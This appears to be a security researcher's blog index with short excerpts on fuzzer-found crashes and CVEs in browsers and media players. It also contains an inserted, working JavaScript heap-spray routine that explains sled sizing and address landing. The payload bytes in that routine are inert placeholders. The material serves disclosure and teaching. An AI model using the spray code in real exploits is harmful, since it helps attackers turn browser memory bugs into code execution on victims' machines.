UltraEdit buffer overflow in GNU Aspell

While looking at logs from my fuzzers, I found a bug in UltraEdit that triggered when I loaded a file with a long string of alphabetic characters…

Apple QuickTime memory corruption when loading BMP file

From http://support.apple.com/kb/HT4104:
CVE-ID: CVE-2010-0536

Impact: Opening a maliciously crafted BMP image may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in the handling of BMP images…

MSIE 9 regular expression related crashes

The following code snippets will crash the MSIE 9 Platform Preview…

Internet Exploiter 2 – bypassing DEP

In 2005 I released Internet Exploiter 2, which helped make heap spraying popular in browser exploits…
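Heap spraying, the technique the post above refers to, works by filling the browser heap with many identical blocks, each a long sled followed by a small payload, so that an attacker-controlled pointer landing almost anywhere in the sprayed region runs the sled into the payload. The block below is an added illustration of that construction written for this page; it is not Internet Exploiter 2 or any other code by the author. The sled pattern, placeholder payload bytes, block size, string-header overhead and spray base address are all assumptions chosen for the example, and the spray count is kept tiny so it runs anywhere.

```javascript
// Added example: classic browser heap-spray construction.
// Not the author's code. All numeric values below are assumptions.

// One UTF-16 code unit occupies two bytes on the heap, so a 4-hex-digit
// pattern such as "0c0c" becomes the byte sequence 0x0c 0x0c in memory.
function charFromHex(hex4) {
  return String.fromCharCode(parseInt(hex4, 16));
}

// Build a sled of `chars` code units by doubling, then trimming.
function buildSled(patternHex4, chars) {
  let s = charFromHex(patternHex4);
  while (s.length < chars) s += s;
  return s.slice(0, chars);
}

// Assemble one spray block: sled followed by payload. The block is sized so
// that headerBytes + 2 * length equals blockBytes, i.e. every block falls in
// the same allocator size class and lands at a predictable stride.
function buildBlock(patternHex4, payload, blockBytes, headerBytes) {
  const totalChars = (blockBytes - headerBytes) / 2;
  if (!Number.isInteger(totalChars) || totalChars <= payload.length) {
    throw new RangeError("block too small for payload");
  }
  return buildSled(patternHex4, totalChars - payload.length) + payload;
}

// Allocate `count` copies. Rebuilding the string each iteration forces a
// fresh allocation instead of reusing one shared string object.
function spray(block, count) {
  const blocks = new Array(count);
  for (let i = 0; i < count; i++) {
    blocks[i] = block.substring(0, block.length - 1) + block.slice(-1);
  }
  return blocks;
}

// Given the address a hijacked pointer will hold, decide whether execution
// would land in a sled rather than in a string header or the payload.
// Assumes the spray starts at `base` and blocks are laid out contiguously.
function landsInSled(addr, base, blockBytes, headerBytes, payloadBytes) {
  if (addr < base) return false;
  const off = (addr - base) % blockBytes;
  return off >= headerBytes && off < blockBytes - payloadBytes;
}

// Constructed demo values (not taken from any real exploit).
const BLOCK_BYTES = 0x100000;          // assumed 1 MiB per block
const HEADER_BYTES = 0x24;             // assumed per-string allocation overhead
const PAYLOAD = "\u9090\u9090\uCCCC";  // placeholder bytes 90 90 90 90 CC CC; inert here
const SLED = "0c0c";                   // 0x0c0c0c0c doubles as a pointer into the
                                       // spray and as harmless "or al, 0x0c" code

const block = buildBlock(SLED, PAYLOAD, BLOCK_BYTES, HEADER_BYTES);
const heap = spray(block, 8);          // a real spray uses hundreds of blocks
```

The point a practitioner should take from the arithmetic is why the payload must stay small relative to the block: with a 1 MiB block and a six-byte payload, `landsInSled` returns true for all but 42 of every 1,048,576 offsets, which is what makes a guessed address such as 0x0c0c0c0c reliable without knowing where any single block was placed.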

ALPHA3 released

I realized that if I waited until I had fully documented everything in ALPHA3, it would probably never get released…

MS09-014: EMBED element memory corruption

Microsoft has just released a fix for an issue I reported to them on December 4th, 2008. A simple repro can be found here

MSIE screen[""] NULL ptr DoS details

MSIE can be made to crash with a NULL ptr Read AV by executing a very small piece of JavaScript. This affects MSIE 6.0, 7.0 and 8.0 beta2…

Safari arguments integer overflow PoC (CVE-2008-2303)

CVE-2008-2303 covers an integer overflow in the handling of indices in the “arguments” array in Apple Safari that affects iPhone, iPod and PC (Mac and Windows). It was fixed in Safari 3.2 for iPhone and iPod in July and for PC in November…